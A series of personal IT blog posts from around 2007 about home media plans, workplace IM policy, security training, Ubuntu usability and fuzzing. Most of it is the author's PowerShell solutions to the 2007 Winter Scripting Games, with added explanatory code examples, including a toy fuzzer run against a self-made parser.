FurryGoat pointed me to the InFrant ReadyNAS device which I think is awesome. An alternative might be using FreeNAS, which could be a good project itself. This could act as a media repository, which is something I would certainly need.

I plan to purchase an X-Box 360, at a minimum, so I would stick to that for my DVD/media playing needs. I think I might need to get a Vista box for my Media Center, but I'm not terribly keen on that idea. I don't really have a powerful enough system right now to run Vista well, although I do have some basic parts for a good base (motherboard and CPU that are good workhorses, but bad for gaming).

Any ideas, feel free to post, but otherwise this is just a planning post for me. I think I would be best served looking into getting into DVD ripping and burning, grab a console machine, and also get a storage NAS set up.
.: pci and data security compliance blog
A recent post by Ed at SecurityCurve.com pointed me over to the PCI and Data Security Compliance blog. Now, I can't speak intelligently about PCI these days, and a real auditor would run circles around me about compliance. I also don't have to deal directly with this yet in my job, but someday I will, no doubt. And while I don't have a ton of learning bandwidth right now to learn compliance, I at least can regularly peruse this blog and get used to the terminology and what is all kinda going on. So by the time I do get thrown into the PCI maelstrom, I can at least orient myself quickly. Kinda like webappsec blogs. I don't do any web app coding for my job right now, but I certainly want to be familiar with the topic.
.: instant messaging in the workplace
I need to watch the episode that Scott Wright references for this post. Instant Messaging is a technology that is still in flux when it comes to corporate use, and I'm always curious on the views people have of it, and how companies use it.

My last company had very little interest in controlling the IT environment. As such, people used Yahoo, AIM, and MSN as they wished. Sales used it regularly, especially those people outside the offices at home or on the road. It really was very useful, even if I wasn't so happy about it. Eventually the company moved to get a centralized (kinda compliant) IM system. We set up a Jabber server, privatized registrations, and got most everyone on that product. Sadly, too often critical business issues were communicated via IM rather than accepted and more loggable avenues of communication such as a ticketing system, phone, or in person searching for someone to assist. Eventually our team went "invisible" on the system because of the abuse and poor "handing-off" of issues via unresponded-to IM messages (and people got pissed that we would always kindly ask for a trouble ticket so that the issue would properly get logged for metrics and reporting). Also, there was widespread fear that we were logging conversations, which drove people away from Jabber. (I never did understand what people were talking about that they were scared it might be logged...besides which we never did turn on logging since no one asked us to do so.) Unfortunately, no one ever supported removing the other IM programs, so eventually Jabber fell by the wayside and only our networking team used it extensively, albeit with a lot of invisibility (hell, our team was geographically split anyway). The user-base then "found" Skype and started installing and using it, despite network team objections. Management had little interest in curbing that, despite the compliance holes. This is an example of the users pushing technology and process due to indifferent management.

My current company has banned IM use. Not only are many systems limited in user rights and installed software, but my IPS and possibly the web proxy will actively block known IM traffic. Needless to say, we don't use IM, but there is talk about evaluating its use, especially as we do a lot of travel business which regularly sees employees in some exotic locations.

What is the proper answer? I don't think there is a universal answer and it will depend on the company, the business needs, and compliance issues. I do think, however, that IM will continue its push into business. Email is broken as a technology and will very, very slowly be replaced with more IM/SMS technologies. I also think that IM is such an integral tool in our culture and lives that business really cannot just completely preclude it forever. I'd rather implement it properly now than later, and reap the business benefits. Many people will argue about lost productivity, but I don't think that will necessarily be the case, especially in a private IM system. Besides, if someone is going to screw around, they will screw around whether it is via IM or not.
.: the training devil's advocate
An article in InformationWeek has sparked some comments through the various security bloggers. I've decided to play devil's advocate for a moment when it comes to user training. Basically, I'm just making a point or two, so don't lambaste me too hard for being wrong or pessimistic. :)

the vcr clock dilemma
How many people do you know have a VCR/DVD player/Oven/Microwave clock that continuously blinks or is set to the wrong time? Ever wonder why? Typically, people don't really care to be bothered with setting it after a power outage. Some people may have faulty power and have interruptions regularly, but most people just don't care enough or maybe even find it cumbersome to change the time.

Similarly in security, not everyone wants to care about the technical ins and outs of security. They don't want to be bothered in their life with technical details. It just might not be their thing, or, if they are adults, they just don't have the time to become an expert. It is easy for us geeks to live this sort of lifestyle and to wonder loudly why people don't educate themselves about their computer, just like it is easy for them to wonder loudly why we don't get out more. :) Some people tune their own cars and motorcycles, others take it to a shop to get fixed, and still others just let it all go to hell. Are those people idiots for doing that? Maybe the latter, but what if maintaining the car costs more than just letting it go and getting another junker? Basically speaking, we can't make people care about their computers and put in enough time to become experts in a way that mitigates their risk. We all have friends who fall into this category, I'm sure.

the trampoline illustration
Most of us have likely seen or played on a trampoline at one time. You tell your kids to watch out and stay in the middle of the trampoline so that they don't smack something on the side rails or outright fly off onto the less forgiving ground. Do kids really listen? Perhaps, but they still make mistakes or just plain do not heed warnings. Users are the same way, and who can blame them every time? Eventually, padding appeared on the supports and even a mesh apparatus encircled the play area like a cage for monkeys (which it kinda was). Now, kids can make a mistake and not have to learn from a broken bone.

This is technology in action. Where good common sense and training and all the words in the world may not have prevented every issue, technology has vastly mitigated the risk of injury and worry to parents. (Of course, there is something that can be said about their lack of developing restraint as they bounce against the mesh cage wildly or not learning by falling...)

Training is excellent to tell someone that a stove is hot. But some people touch it anyway. If your company cannot afford to have someone test the stove or play around near the stove and misjudge a distance or handfall, then you need to isolate the heat or the stove from the curious hands (technology). Many companies and employees cannot afford a mistake that technology could have prevented.


Now, all of that aside, training is important and will help augment technology. Training lessens user outrage at changes and restrictions they do not understand (at least for some, others will refuse to get it no matter what and just want their way). Training will help in those instances where technology cannot make the decision in a situation, and employees need to make better common sense decisions. Training will allow willing learners to become educated about technology and security at work and home. And training is even more necessary when talking about implementors of technology. Can you have untrained security guards make confident decisions about letting a C-level exec into the building with contraband or without a pass? Can you have untrained network admins building your firewall rules? Training should definitely be mandatory for those people who touch or work with the technological security measures. But for the typical worker bee (no offense intended) employees, the effect of their education is still arguable.

some rhetoricals
The mishandling of data is one of the biggest problems, especially when we're talking regular employees and their security infractions. But how can technology safeguard that? How can education safeguard that? How can social engineering ever be wiped out?
.: linux as main box part 9: the bad
Going on about 5 months using Ubuntu as my primary laptop and things are still relatively good; good enough to stick with it. I do have a companion laptop with Windows XP that I use to stay sharp on XP, try out new stuff, and do the few things that Linux won't do yet (particularly run my favorite P2P program, SoulSeek).

However, there are some growing concerns, particularly in how robust Linux can be as a desktop machine.

Ubuntu is sluggish. I've long noticed this, but only lately is it really grinding on me. Ubuntu with Gnome is not nearly as crisp to respond as my tried and true Windows machines. Nautilus is even slower and clunky and will sometimes hang when transferring 70+ files over an SMB connection on my network. Firefox 1.5.x (the kind Ubuntu 6.06 supports) is crashing or just having problems loading some content. Firefox on Ubuntu is far slower than Firefox on Windows, even on worse hardware, both on load and in serving content.

I'm going to stick with Linux because I really want to learn it, but I will say I don't think it is yet ready to displace other OSs on the typical desktop. It still can't do many things out of the box and it just is not as swift as Windows (assuming Windows is relatively free of spyware/adware). Linux has a long history of being appropriate for geeks, but Windows has a long history of meeting the needs of a vast majority of common users...and that's where the desktop market is.

I am going to see if I can get Kubuntu 6.10 up and running on another box and try it out before I think about replacing my Ubuntu 6.06 install. Perhaps KDE will be more to my liking and I'm totally willing to check it out.
.: favorable conditions at work...and play
"By 'strategic advance' I mean making the most of favorable conditions and tilting the scales in our favor." - The Art of War, Chapter 1: On Assessments

Definitely useful to make the most of good situations when dealing with security. If you suddenly get a budget or have a chance to make an incident into a growing experience, do it. Likewise, be ready to make the most of bad conditions. Budgets or internal issues should not stop necessary security from being cobbled together.

"The supreme accomplishment is to blur the line between work and play." - Arnold Toynbee

Thankfully, when I am with a company I like, work and play are very blurred. Ahh, the geek lifestyle! This quote can be very easily twisted and might make some people very upset because they value separating work and play, but all of us are different, and it has been my mantra in 2006 and ongoing into this year to enjoy my work so much that it feels like play, since I play what I end up doing at work anyway for now. I just want to enjoy the way I spend 1/3 of my day (which you can extrapolate to being 1/3 of the rest of my working life). I want to thoroughly enjoy my job, company, and team, and I likely won't be settled until I find that balance.
.: microsoft scripting games 2007
I work in a Windows environment. I'll likely work with Windows in some form or other for my entire career, unless I get completely sucked into networking. And yet I don't know Windows scripting. Oh the travesty! Seriously, I like programming, but I've never freakin' properly learned Windows scripting. I think I will be taking a good hard look at the Microsoft Scripting Games 2007 to see how things work and maybe tackle a few of the easier challenges and get my feet wet. Really, I don't need to be some guru that uses scripting day in and day out. You can get by quite well with things like maintenance scripting by just occasionally challenging yourself to script a little bit.

And I like challenges like these Games. There are a few ways to learn in this field of IT security, support, and networking. One way is troubleshooting fires that are burning. You can only learn so much theory from other people, books, and mentors. But you have to put it into practice to really get it in this area (hence my occasional disdain for analysts, IT journalists, and people who just repeat "best practices" ad nauseam). I particularly love challenges, puzzles, and friendly competitions that run the gamut of amazingly fun to very competitive to real-life-mirroring scenarios.

In fact, in the sidebar menu way towards the bottom I have links to various "hacking" and other challenges mixed into the "cons/training" section. I have been putting off moving the actual challenge type items down to the new challenges section. I love those things, and even if I'm late to the party or don't know the answers, reading the practical solutions offers some excellent insight.

Anyway, I'll see how my schedule looks and try my hand at the Microsoft Scripting Games.

Someday, I may actually post my answers to various challenges past and present on either this blog, or more likely on my wiki. I find that while reading is great theory, and hands-on is great experience, being able to regurgitate the steps and lessons on virtual paper for others to understand is the last step. When you can teach someone something, you reinforce your learning of it, even if the audience is non-existent and you're just recording it down in a place no one else will look, or describing it to a loved one who really doesn't care but is a willing sounding board.

Some *real* quick links from a Google search:
Windows PowerShell
Getting started (vbscript)
PowerShell blog and links
PowerShell FAQ
.: some web links from askapache mostly
Two sites I like to peruse for new ideas on things to try: AskApache.com and Howtoforge.com. Here are some links from there and elsewhere just for my own note, maybe for this weekend. I cannot attest to the quality of this information yet.

on favicons
on robots.txt
sniffing undetected?
bypassing VLANs?

odysseus and telemachus
.: why do I stay updated on black hat techniques?
"Therefore, the business of waging war lies in carefully studying the designs of the enemy." -The Art of War, The Nine Kinds of Terrain

Carefully studying the enemy motivations and plans and mindset but also knowing their machinations, technology, techniques, and habits. Every now and then I hear about how evil it is to have "hacking" books that shouldn't be teaching all the techniques and steps. I don't buy that and think that we need knowledge and study not only of security, but of insecurity so that we can assess risk and protections properly.

Another aspect of this quote is carefully studying a war in progress so that you can move intelligently. If you have an attacker in your network doing something bad, carefully study them so you know what they want, what defenses they may have already dug in, and be best able to defeat them. Just like a chess game that has developed from the start game into one side moving into an offensive position. Play as many steps ahead as your time and brain allow.
.: being a guru with new things
Just a quick word of advice, both to anyone reading and myself as well. If you find yourself at a point in your career where you have some good experience/knowledge and some free time to spend either in your job or just at home when geeking out, keep your eyes open for new things and grab onto them with both hands. Look for something new, learn it, and become one of the early gurus. Things like PCI knowledge, PowerShell, wireless technologies, FDE, Python, AJAX, VMWare, and many other things I have had the chance to see kinda appear and grow in my time in IT. And those people who latched on early and became gurus definitely end up being go-to guys in their own company, the community, and possibly beyond. People who are suddenly the "first" to offer good insight and knowledge on something new get noticed for it.

Just a note to look for in the future as technologies, languages, and practices continue to move forward. This might not mean you can become a highly paid consultant or start your own business, but at least keeping the above in mind might really grow you professionally and get you noticed in the community.
.: winter scripting games have begun!
"Thus in war, I have heard tell of a foolish haste, but I have yet to see a case of cleverly dragging on the hostilities." -The Art of War, Chapter 2: On Waging Battle

I take this to mean, do. Don't wait around and throw sticks at information security. Do things. Get to work. Perform some action.

They have begun! I started in on the Beginner challenges and finished the first two rather quickly. Just for my own benefit (ego) I'll post my own answers here after the deadlines. If nothing else, it will be just for me to document my own code and dive into PowerShell.

Since I did the two first beginner events, I thought I'd try out the Advanced ones. These are a lot more complicated for me as a beginner, but at least I know the logic and can think through things like how to get from problem A to solution B. Now I just have to look up each little step like getting input into an array, any nuances with variable types (if any) that PowerShell may have, proper syntax for ForEach loops and Switches, and basically working with arrays. I also need to see how it performs with null values or the ends of arrays. Thankfully, the PowerShell syntax so far seems very familiar and standard. I think I might be fine with a couple of the Advanced problems.
.: things get lost? no way!
So, the FBI is still losing laptops with sensitive information. What I really hate about this sensationalist news is things have been lost or stolen for decades upon decades. We have laptops and mobile devices and they will get lost. That's fact and that's going to be absolute. This is a classic example of a security incident that will happen. That means the real story here is about damage mitigation, disk encryption, and data management.
.: scripting games day 1 and 2: feet are wet
This post is just about my time with PowerShell for the 2007 Winter Scripting Games. If you have no interest, I certainly won't be upset if you skip this post. I'm posting only because this will mark my first exposure to PowerShell.

The games have begun. Event 1 in the Beginner's section basically wanted the creation of a message box (dialogue box, pop up box, et al) that changed a few attributes and did something based on the return behavior. My code looked like this:
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$answer = [System.Windows.Forms.MessageBox]::Show("Do you want to continue?", "Continue Processing", "YesNo", "Question")
if ($answer -eq "yes")
{echo "Yes - Processing will continue..."}
else
{echo "No - Processing stopped"}
Nothing really special there. The only bad part is that I wasn't able to bring the pop up box to the front, although some Googling turned up that this is a known issue that can be solved with vbscript.

Beginner Event 2 was a series of questions, each scored independently. In one column were ten classes, and in a second column were ten properties. The question is to match the classes with their properties. Not so bad. While I could eyeball this list and likely get an easy 8 of 10 correct, a couple would have required guesses. However, there is an easier way to do this:
get-wmiobject [class] | get-member
Replace [class] with the class name and look through the list for the matching terms.

Now, because of my success in the Beginner Events, I thought I would try my hand at the Advanced Events, which are definitely more up my alley as long as they stay in the "logic" arena as opposed to knowing my way around all the various obscure commands and methods and objects in PowerShell that I don't know yet.

Event A1 wanted to convert from Roman Numerals to regular numbers. This actually proved more interesting than I thought it would be, and my eventual program, while satisfying the requirements, would not hold up to invalid input, error checking, or additional roman numerals above M.
$r = Read-Host "Please enter a Roman numeral:"
$a1 = $r.ToCharArray()
$a2 = @()
$value = 0
$flip = 0

# First pass: map each numeral to its value (switch is case-insensitive by default)
for ($i=0;$i -lt $a1.length;$i++){
Switch ($a1[$i]){
"M" {$a2 += 1000}
"D" {$a2 += 500}
"C" {$a2 += 100}
"L" {$a2 += 50}
"X" {$a2 += 10}
"V" {$a2 += 5}
"I" {$a2 += 1}
}
}

# Second pass: a value smaller than the one after it is subtractive (IV, XC, CM),
# and $flip carries that fact into the next iteration. Past the end of the array
# $a2[$i+1] is $null, which compares as less than any number.
for ($i=0;$i -lt $a2.length;$i++){
$v1 = $a2[$i-1]
$v2 = $a2[$i]
$v3 = $a2[$i+1]

if ($flip -eq 1){$value += ($v2 - $v1);$flip=0}
elseif ($v2 -ge $v3){$value += $v2}
else {$flip=1}
}

Write-Host $value

Event A2 was simpler even though I had more trouble finding the information I needed (syntax, really): find the number that, when multiplied by 3, gives the smallest answer consisting of nothing but 4s. The answer is 148. I could have written a script that iterates through every number, multiplies it by 3, and checks whether the answer is all 4s, or started with ten 4s and divided by 3 all the way down to the lowest, but I eventually decided to just build a string of growing 4s and check each one to see if it was evenly divisible. Sadly, when I submitted my entry I made the mistake of echoing out "444" instead of the needed "148." D'oh! I was too excited about figuring this one out!
$a = @()
do {
$a += 4
$b = [String]::join("",$a)
$m = $b % 3
if ($m -eq 0){
$x = $b / 3
write-Host $x}
}
until ($m -eq 0)

Not too shabby there, I hope! So far, that is very encouraging and my goal has expanded to not just completing the Beginner section, but to complete at least half of the points from the Advanced.
.: comment spam
Of course it is only a matter of time, but I have slowly seen a few comment spam posts on my blog here. This is an interesting way to see the growth of comment spam and make a few observations.

First, I've only seen comment spam on just a few of my posts, and typically over a week I'll get about 10 comments on just those posts, no others. Odd, especially since two of them even pre-date this URL and site (posts ported over from my older site). I would almost think I am just getting collateral damage from a link to my site from somewhere else, but no one links to those posts that I can see. I might have to analyze my logs a bit deeper just out of curiosity. They are also almost all in chunks and only yesterday did they start getting past the junk comment filters in MovableType.

1/09 - 1/21 spam came to html in email from 12/2006
1/22 spam came to malware analysis: free video codec from 11/2006
1/31 - 2/07 spam came to illustrated guide to cryptography from 6/2006
2/02 - today spam came to remoteregistry issues from 8/2004
2/13 - today spam came to turn off ssdp and upnp from 8/2004

Second, I thought about changing their spam comments to something like, "My IP is blah and I tried to post comment spam." But that itself is spammy and won't scale. Or post regularly about my spammers, but again that is spammy itself and likely are just "innocent" bots.

I think I'll just keep deleting them, but I am happy with MT's ability to score comments and hold them Unpublished if there is too much HTML in the comments. Also, there are limits to the length of certain fields which no legitimate poster should bump against, but spammers might hit. Still, some do get through. I also like that I can subscribe to an RSS comments feed which will show me published and unpublished comments readily so I can catch these things.
.: the problem with fuzzing as a security posture
Mike Rothman mentioned fuzzing today which prompted me to post a thought of my own. Fuzzing is not a security posture.

Fuzzing pretty much means throwing all sorts of "things" at an application, whether into input fields, at network ports, and so on. This is something any dummy can run. But determining whether a fuzzing result is really a vulnerability is an order of magnitude more difficult. This isn't the same as looking at an open port reported by Nessus or a missing patch reported by MBSA. Not only that, but fuzzing is not as fast as even an nmap scan on a network. The setup and execution take longer.

Once you get the results, oftentimes you will need some memory management skills to determine if a bug will actually pop the stack properly, and then craft an exploit to prove the issue. Otherwise you might just have found some lame bug that closes the application (DoS), or less. If we raised the alarm on every issue a fuzzer found, we wouldn't be having "Month of X Bugs," but rather multiple "Years of X Bugs." Check out the comments on some of those posts to see the contention some people raise over whether a fuzzed result is truly exploitable or not.

Fuzzing is not terribly difficult. Interpreting the results takes an expert, unlike other scanning methods. Fuzzing won't be a part of most IT shops or even developer circles for a long time until they start learning what happens in the OS/memory and not just doing their interpreted coding to do task A and move item B. Even QA will be hard-pressed to be given training and time to perform real fuzzing in all but the most critical and rich organizations.
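To make the triage point concrete, here is an added example (mine, not from the post): a toy length-prefixed parser, a mutation fuzzer that hammers it, and the bucketing step that collapses hundreds of crashing inputs into a few distinct signatures and separates the parser's own input rejection from unhandled failures. The parser, its record format, the seed input and all the function names are invented for the example. In a managed language the "crash" is an exception with a clean traceback; for a native target this same bucketing is done on a debugger or sanitizer report, and deciding whether a bucket is memory corruption rather than a plain fault is the expert step the post is talking about.

```python
import random
import traceback


def parse_record(data):
    """Toy TLV parser constructed for this example: repeated fields of
    1 byte type, 1 byte length, then `length` bytes of payload."""
    pos = 0
    fields = []
    while pos < len(data):
        ftype = data[pos]
        length = data[pos + 1]                      # IndexError if truncated here
        payload = data[pos + 2:pos + 2 + length]    # silently short if truncated here
        if ftype == 1:
            fields.append(("int", int.from_bytes(payload, "big")))
        elif ftype == 2:
            fields.append(("str", payload.decode("ascii")))    # UnicodeDecodeError
        elif ftype == 3:
            fields.append(("ratio", payload[0] / payload[1]))  # IndexError / ZeroDivisionError
        else:
            raise ValueError("unknown field type %d" % ftype)  # the parser's own rejection
        pos += 2 + length
    return fields


# Constructed well-formed seed: an int field, a string field and a ratio field.
SEED_INPUT = bytes([1, 2, 0x01, 0x02, 2, 3]) + b"abc" + bytes([3, 2, 8, 4])


def mutate(data, rng):
    """One random mutation: overwrite a byte, truncate, or insert a byte."""
    choice = rng.randrange(3)
    buf = bytearray(data)
    if choice == 0 and buf:
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    elif choice == 1 and buf:
        del buf[rng.randrange(len(buf)):]
    else:
        buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
    return bytes(buf)


def crash_signature(exc):
    """Exception class plus the innermost frame: the key used to collapse
    thousands of crashing inputs into a handful of distinct bugs."""
    frame = traceback.extract_tb(exc.__traceback__)[-1]
    return (type(exc).__name__, frame.name, frame.lineno)


def fuzz(target, seed, iterations, rng_seed=0):
    """Run the mutator against target; return {signature: first input that hit it}."""
    rng = random.Random(rng_seed)
    buckets = {}
    for _ in range(iterations):
        case = mutate(seed, rng)
        try:
            target(case)
        except Exception as exc:
            buckets.setdefault(crash_signature(exc), case)
    return buckets


def triage(buckets):
    """Separate the parser's deliberate rejection (its own ValueError) from
    unhandled exceptions, which are the findings worth a closer look."""
    handled = {sig for sig in buckets if sig[0] == "ValueError"}
    return {"handled": sorted(handled), "unhandled": sorted(set(buckets) - handled)}


if __name__ == "__main__":
    results = fuzz(parse_record, SEED_INPUT, 500)
    report = triage(results)
    print("distinct crash signatures:", len(results))
    for sig in report["unhandled"]:
        print("unhandled", sig, "first input:", results[sig].hex())
    for sig in report["handled"]:
        print("handled  ", sig)
```

Five hundred inputs typically collapse to well under ten signatures, and even in this toy the unhandled set mixes a denial-of-service class (an unbounded index read on truncated data) with a logic flaw the fuzzer never flags at all: a truncated payload is accepted and parsed as a shorter value. That second kind is what no crash bucket will ever show you.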
.: winter scripting games: events 3 and 4
This post is just about my time with PowerShell for the 2007 Winter Scripting Games. If you have no interest, I certainly won't be upset if you skip this post. I'm posting only because this will mark my first exposure to PowerShell.

Beginner Event 3 was a pretty easy exercise in picking out what item in a series is not like the others. I'm sure this can be done in less code, but this made the quickest sense to me with the least effort.
$a1 = "monday", "MONDAY", "monday"
$a2 = "TUESDAY", "tuesday", "tuesday"
$a3 = "WEDNESDAY", "wednesday", "wednesday"
$a4 = "thursday", "thursday", "THURSDAY"
$a5 = "friday", "FRIDAY", "friday"

$x1a = [String]::Compare($a1[0],$a1[1],$False)
$x1b = [String]::Compare($a1[1],$a1[2],$False)
$x1c = [String]::Compare($a1[0],$a1[2],$False)
if ($x1a -eq 0){"a1: third"}
elseif ($x1b -eq 0){"a1: first"}
else{"a1: second"}

$x2a = [String]::Compare($a2[0],$a2[1],$False)
$x2b = [String]::Compare($a2[1],$a2[2],$False)
$x2c = [String]::Compare($a2[0],$a2[2],$False)
if ($x2a -eq 0){"a2: third"}
elseif ($x2b -eq 0){"a2: first"}
else{"a2: second"}

$x3a = [String]::Compare($a3[0],$a3[1],$False)
$x3b = [String]::Compare($a3[1],$a3[2],$False)
$x3c = [String]::Compare($a3[0],$a3[2],$False)
if ($x3a -eq 0){"a3: third"}
elseif ($x3b -eq 0){"a3: first"}
else{"a3: second"}

$x4a = [String]::Compare($a4[0],$a4[1],$False)
$x4b = [String]::Compare($a4[1],$a4[2],$False)
$x4c = [String]::Compare($a4[0],$a4[2],$False)
if ($x4a -eq 0){"a4: third"}
elseif ($x4b -eq 0){"a4: first"}
else{"a4: second"}

$x5a = [String]::Compare($a5[0],$a5[1],$False)
$x5b = [String]::Compare($a5[1],$a5[2],$False)
$x5c = [String]::Compare($a5[0],$a5[2],$False)
if ($x5a -eq 0){"a5: third"}
elseif ($x5b -eq 0){"a5: first"} else{"a5: second"}

Beginner Event 4 just wanted a nicely formatted list of running services.
get-service | where-object {$_.status -eq "running"} | format-table -property DisplayName, Status -auto

Advanced Event 3 involved a program to make change in various denominations. Not too bad, and I was pretty happy with my initial formatting of the input.
$a = Read-Host "Enter your dollars"
# Strip the "$" and any thousands separators, then work in whole cents so that
# "12.5", "12.50" and "12" all mean the same amount
$a = $a -replace '[\$,]',''
$a = [int][math]::Round([decimal]$a * 100)
$a = 5000 - $a
$change = $a / 100
$change = "{0:N2}" -f $change

$tens = $a / 1000
$tens = [math]::truncate($tens)
$a = $a - $tens * 1000
$fives = $a / 500
$fives = [math]::truncate($fives)
$a = $a - $fives * 500
$ones = $a / 100
$ones = [math]::truncate($ones)
$a = $a - $ones * 100
$quarters = $a / 25
$quarters = [math]::truncate($quarters)
$a = $a - $quarters * 25
$dimes = $a / 10
$dimes = [math]::truncate($dimes)
$a = $a - $dimes * 10
$nickels = $a / 5
$nickels = [math]::truncate($nickels)
$a = $a - $nickels * 5
$pennies = $a / 1
$pennies = [math]::truncate($pennies)

Write-Host "Change returned: $change"
Write-Host "Tens: $tens"
Write-Host "Fives: $fives"
Write-Host "Ones: $ones"
Write-Host "Quarters: $quarters"
Write-Host "Dimes: $dimes"
Write-Host "Nickels: $nickels"
Write-Host "Pennies: $pennies"

Advanced Event 4 was also fairly easy and fun in attempting to map out the various Chinese new year animals. I did it a slightly harder way than they gave in their answer.
[int]$a = Read-Host "Enter your year"
$a = $a - 1900
$b = $a / 12
$b = [math]::truncate($b)
$b = $b * 12
$a = $a - $b
# Years before 1900 leave a negative remainder; shift it back into 0..11
if ($a -lt 0){$a = $a + 12}

switch($a)
{
"0"{$answer="Rat"}
"1"{$answer="Ox"}
"2"{$answer="Tiger"}
"3"{$answer="Rabbit"}
"4"{$answer="Dragon"}
"5"{$answer="Snake"}
"6"{$answer="Horse"}
"7"{$answer="Goat"}
"8"{$answer="Monkey"}
"9"{$answer="Rooster"}
"10"{$answer="Dog"}
"11"{$answer="Pig"}
}
Write-Host $answer

.: winter scripting games: events 5 and 6
This post is just about my time with PowerShell for the 2007 Winter Scripting Games. If you have no interest, I certainly won't be upset if you skip this post. I'm posting only because this will mark my first exposure to PowerShell.

Beginner Event 5 can be done rather easily in vbscript. I needed to convert a string into a hexadecimal array and then back into a string. I was able to make the first conversion, but couldn't work out how to go backwards. I actually couldn't get from hex to ASCII code, but I could easily get the rest of the way back to a real string of readable characters. Oh well.
$r = "It was the best of times...you know the rest."
$a = $r.ToCharArray()
$h = @()

# Each character code becomes one hex string ("{0:X}" formats as uppercase hex).
# -lt, not -le: $a[$a.length] is past the end of the array.
for ($i=0;$i -lt $a.length;$i++){
$x = [int][char]$a[$i]
$h += "{0:X}" -f $x
}
$h

# The way back. These were the attempts at hex -> character code that did not work,
# left commented out as they were.
for ($i=0;$i -lt $h.length;$i++){

# $y = [byte]$h[$i]
# $y = "{0:D}" -f $h[$i]
# $y = [Convert]::ToString($h[$i],16)
#this is the last part $y = [char][int]$h[$i]
$y

}
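For the record, here is the round trip that stalled above, written as an added example rather than the post's own code: the missing step is [Convert]::ToInt32 with base 16, which turns each hex string back into a character code.

```powershell
# Added example, not the post's own code: string -> hex array -> string.
function ConvertTo-HexArray {
    param([string]$Text)
    [string[]]$hex = @()
    foreach ($ch in $Text.ToCharArray()) {
        # X2 pads to two digits so every code (e.g. 0A for a newline) has the same width.
        $hex += "{0:X2}" -f [int]$ch
    }
    return $hex
}

function ConvertFrom-HexArray {
    param([string[]]$Hex)
    $sb = New-Object System.Text.StringBuilder
    foreach ($h in $Hex) {
        # Base-16 text -> integer code -> character: the step the post could not find.
        [void]$sb.Append([char][Convert]::ToInt32($h, 16))
    }
    return $sb.ToString()
}

$r = "It was the best of times...you know the rest."
$h = ConvertTo-HexArray $r
[string]::Join(" ", $h)
$back = ConvertFrom-HexArray $h
# -ceq is a case-sensitive comparison, so "It" and "it" would not be treated as equal.
if ($back -ceq $r) { Write-Host "Round trip OK" } else { Write-Host "Round trip FAILED" }
```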

Beginner Event 6 just wanted some key words to be filled into an incomplete script found at the link above. I think my answers were correct...and if not, the program did run as expected anyway.
1. -eq
2. }
3. foreach
4. continue (although this can just be left blank too)
5. While
6. Switch

Advanced Event 5 wanted an Access database opened, then some math computations made, namely the min, max, mode, median, and mean values. Now, this can be very easy in other languages, but for some reason either PowerShell does not have these helpers built in yet, or I wasn't able to find how to do it properly. Either way, here it is. If you really delve into my code, you can see that by the time I did the median, I was using better techniques than I had been using earlier. If I wanted to, I could rewrite the max and min sections much smaller now, I think.
$adOpenStatic = 3
$adLockOptimistic = 3
$objConnection = New-Object -comobject ADODB.Connection
$objRecordset = New-Object -comobject ADODB.Recordset
$objConnection.Open("Provider = Microsoft.Jet.OLEDB.4.0 ; Data Source = /scores.mdb")
$objRecordset.Open("Select * from Results",
$objConnection,$adOpenStatic,$adLockOptimistic)

####### START MEAN #######
$objRecordset.MoveFirst()
$i = 0      # row count
$avg = 0    # running total

do {
$avg += $objRecordset.Fields.Item("Score").Value
$i++;$objRecordset.MoveNext()}
until ($objRecordset.EOF -eq $True)

$avg = [math]::truncate($avg / $i)

####### START MAX #######
$objRecordset.MoveFirst()
$max = 0

do {
if ($objRecordset.Fields.Item("Score").Value -gt $max)
{ $max = $objRecordset.Fields.Item("Score").Value}
$objRecordset.MoveNext()}
until ($objRecordset.EOF -eq $True)

####### START MIN #######
$objRecordset.MoveFirst()
$min = $max

do {
if ($objRecordset.Fields.Item("Score").Value -lt $min)
{ $min = $objRecordset.Fields.Item("Score").Value}
$objRecordset.MoveNext()}
until ($objRecordset.EOF -eq $True)

####### START MODE #######
# One counter per possible score from 0 to $max: index = score, value = how often it occurs.
[int[]]$modearray = @()

for ($n=0;$n -le $max;$n++)
{$modearray += 0
}
$objRecordset.MoveFirst()

do {
$n = $objRecordset.Fields.Item("Score").Value
$modearray[$n] = $modearray[$n] + 1
$objRecordset.MoveNext()}
until ($objRecordset.EOF -eq $True)

$modemax = 0

for ($n=0;$n -lt $modearray.length;$n++)
{
if ($modearray[$n] -gt $modemax)
{ $mode = $n; $modemax = $modearray[$n]}
}

####### START MEDIAN #######
# Copy every score into an array, sort it, and take the middle element
# (for an even number of scores this picks the upper of the two middle values).
[int[]]$medianarray = @()

for ($n=0;$n -lt $i;$n++)
{$medianarray += 0}

$n = 0
$objRecordset.MoveFirst()

do {
$medianarray[$n] = $objRecordset.Fields.Item("Score").Value
$n++;$objRecordset.MoveNext()}
until ($objRecordset.EOF -eq $True)

$medianarray = $medianarray | sort
$median = $medianarray[[math]::floor($medianarray.length/2)]

####### START OUTPUT #######
Write-Host "Mean: $avg"
Write-Host "Mode: $mode"
Write-Host "Median: $median"
Write-Host "Highest score: $max"
Write-Host "Lowest score: $min"

$objRecordset.Close()
$objConnection.Close()
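As an added example (not the post's code or the games' answer), here are the same five statistics done with Measure-Object and Group-Object over a constructed in-memory list of scores standing in for the Access table, including a proper even-count median:

```powershell
# Added example, not the post's own code: mean, min, max, mode and median with
# Measure-Object and Group-Object in place of the hand-rolled recordset loops.
function Get-ScoreStats {
    param([int[]]$Scores)
    if ($Scores.Count -eq 0) { throw "No scores supplied." }

    # Count, average, minimum and maximum in one pass over the data.
    $m = $Scores | Measure-Object -Average -Minimum -Maximum

    # Mode: group equal values, keep the biggest group; ties go to the lower score.
    $top = $Scores | Group-Object |
        Sort-Object -Property @{Expression = 'Count'; Descending = $true},
                              @{Expression = { [int]$_.Name }} |
        Select-Object -First 1

    # Median: middle element for an odd count, mean of the two middle ones for even.
    $sorted = @($Scores | Sort-Object)
    $n = $sorted.Count
    if ($n % 2 -eq 1) {
        $median = $sorted[($n - 1) / 2]
    } else {
        $median = ($sorted[$n / 2 - 1] + $sorted[$n / 2]) / 2
    }

    New-Object PSObject -Property @{
        Count  = $m.Count
        Mean   = $m.Average
        Min    = $m.Minimum
        Max    = $m.Maximum
        Mode   = [int]$top.Name
        Median = $median
    }
}

# Constructed sample standing in for the Score column of the Results table.
$sample = 88, 92, 75, 92, 60, 75, 92, 81
Get-ScoreStats -Scores $sample | Format-List Count, Mean, Min, Max, Mode, Median
```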

